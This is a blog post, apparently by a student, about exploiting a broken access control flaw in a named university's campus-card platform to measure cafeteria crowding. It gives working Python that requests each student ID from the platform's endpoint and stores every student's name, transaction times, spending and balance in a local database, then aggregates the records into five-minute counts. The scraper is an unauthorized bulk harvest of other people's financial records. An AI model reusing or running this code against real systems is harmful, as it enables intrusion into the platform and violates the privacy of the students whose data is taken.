This article was last modified 873 days ago, so some of its content may be out of date. If you have questions, ask the author.

Background

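I started eating at the school cafeteria a few days ago, but the lunchtime queue is far too long every day, and I don't want to leave the dorm just to check... So I wanted to build something that monitors campus card transaction activity in real time, so I can tell how crowded the cafeteria is without leaving the dorm (lol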

0x1

Conveniently, the school's campus card platform has a broken access control flaw that can be used to run a crawler.
0x1.1
As shown, the POST request body contains the student ID and the date range to query.
0x1.2

0x2

OK
All that's left is to write the code...
The core of the crawler

import sqlite3
import time

import bs4
import requests


def craw(stuid):
    # One database file per day, one table per student ID.
    day = time.strftime("%Y-%m-%d", time.localtime())
    conn = sqlite3.connect('datas_' + day + '.db')
    sqlexec = conn.cursor()
    value = []
    url = "http://ecard.swust.edu.cn/web/admin/ecardrules;jsessionid=66C1FF6AA93810DD5DDCEB67D2B62D0?p_p_id=accounttransdtl&p_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_pos=1&p_p_col_count=5&_accounttransdtl_struts_action=%2Fext%2Faccounttransdtl_queryresult"
    # The POST body carries the student ID and the date range (today only).
    payload = {"custId": "", "stuempno": stuid, "queryaccountdtl_begindate": day, "queryaccountdtl_enddate": day}
    r = requests.post(url, data=payload)
    soup = bs4.BeautifulSoup(r.text, "html.parser")
    if soup.tbody:
        sqlCreatTable = "create table stu_" + str(stuid) + " (name varchar(255),time_day varchar(255),time_min varchar(255),type varchar(255),consume varchar(255),remainder varchar(255));"
        sqlexec.execute(sqlCreatTable)
        # Flatten every table cell; each transaction record spans 8 cells.
        for i in soup.tbody.find_all("td"):
            value.append(i.string)
        for count in range(len(value) // 8):
            # Placeholders avoid breaking the statement on quotes in cell text.
            sqlIncertValue = "INSERT INTO stu_" + str(stuid) + " (name,time_day,time_min,type,consume,remainder) VALUES (?,?,?,?,?,?)"
            sqlexec.execute(sqlIncertValue, (value[3+8*count], value[0+8*count], value[1+8*count], value[4+8*count], value[6+8*count], value[7+8*count]))

        print("crawing:" + str(stuid))
    else:
        print(str(stuid) + " does not exist.")
    conn.commit()
    conn.close()
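
The row-slicing step in craw can be checked on its own, without touching the network or the database. Below is a minimal sketch, assuming each record spans 8 cells in the positions that the index arithmetic above implies. The helper name `cells_to_rows`, the `COLUMNS` mapping, and the sample cell values are all hypothetical and made up for illustration.

```python
# Hypothetical helper: group a flat list of <td> strings into records.
CELLS_PER_ROW = 8

# Cell positions as used by craw(): column name -> index within one record.
COLUMNS = {
    "name": 3,
    "time_day": 0,
    "time_min": 1,
    "type": 4,
    "consume": 6,
    "remainder": 7,
}


def cells_to_rows(cells):
    """Return one dict per complete 8-cell record; a trailing partial record is dropped."""
    rows = []
    for count in range(len(cells) // CELLS_PER_ROW):
        chunk = cells[CELLS_PER_ROW * count:CELLS_PER_ROW * (count + 1)]
        rows.append({col: chunk[pos] for col, pos in COLUMNS.items()})
    return rows


# Made-up sample data: two complete records plus one stray cell.
sample = [
    "2016-03-01", "120501", "x", "Alice", "consume", "x", "-8.50", "41.50",
    "2016-03-01", "121233", "x", "Alice", "consume", "x", "-2.00", "39.50",
    "stray",
]
rows = cells_to_rows(sample)
```

Working with named fields like this makes it easier to notice when the page layout changes and the cell positions shift.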

The core of the data aggregation

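import sqlite3
import time

day = time.strftime("%Y-%m-%d", time.localtime())
conn = sqlite3.connect('datas_' + day + '.db')
s = conn.cursor()
skip = 5    # bucket width in minutes
stuid = []  # table names, one per student
x = []      # bucket labels, "HH:MM"
y = []      # number of transactions per bucket
s.execute("select * from sqlite_master")
for i in s.fetchall():
    stuid.append(i[1])  # column 1 of sqlite_master is the object name
for hour in range(24):
    for minute in range(0, 60, skip):
        tmp_add = 0
        s_hour = "%02d" % hour
        s_min = "%02d" % minute
        x.append(s_hour + ":" + s_min)
        for stu_one in stuid:
            s.execute("select * from " + stu_one + " where time_min like '" + s_hour + "%'")
            for time_m in s.fetchall():
                # time_m[2] is time_min; characters 2-3 are read as the minute.
                # The window [minute - skip, minute] is inclusive at both ends,
                # so the HH:00 bucket only matches transactions at minute 00.
                if minute - skip <= int(time_m[2][2:4]) <= minute:
                    tmp_add += 1
        y.append(tmp_add)
conn.close()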
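
The loop above re-queries every table for every 5-minute slot. As an alternative sketch (not the method used in this post), the same kind of histogram can be built in a single pass over the time strings. It assumes time_min values look like HHMMSS, which is what the [2:4] slice above suggests. It also uses half-open buckets [m, m+skip) rather than the inclusive window above, so the counts will not match the original exactly. The function name `bucket_counts` and the sample times are hypothetical.

```python
from collections import Counter


def bucket_counts(times, skip=5):
    """Count HHMMSS time strings per skip-minute bucket.

    Returns (x, y): x holds "HH:MM" labels for the whole day in time order,
    y holds the number of transactions that fall in each bucket.
    """
    counts = Counter()
    for t in times:
        hour, minute = int(t[0:2]), int(t[2:4])
        start = minute - minute % skip  # round down to the bucket start
        counts["%02d:%02d" % (hour, start)] += 1
    x = ["%02d:%02d" % (h, m) for h in range(24) for m in range(0, 60, skip)]
    y = [counts[label] for label in x]  # missing buckets count as 0
    return x, y


# Made-up sample times around noon.
x, y = bucket_counts(["115830", "120001", "120459", "120500"])
```

With half-open buckets every transaction lands in exactly one slot, so the values in y always sum to the number of input times.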

The remaining multiprocessing and plotting parts are omitted here.

0x3

The plot shows that the 5-minute bucket at exactly 12:00 briefly dips to a trough. 0.0
interesting
0x3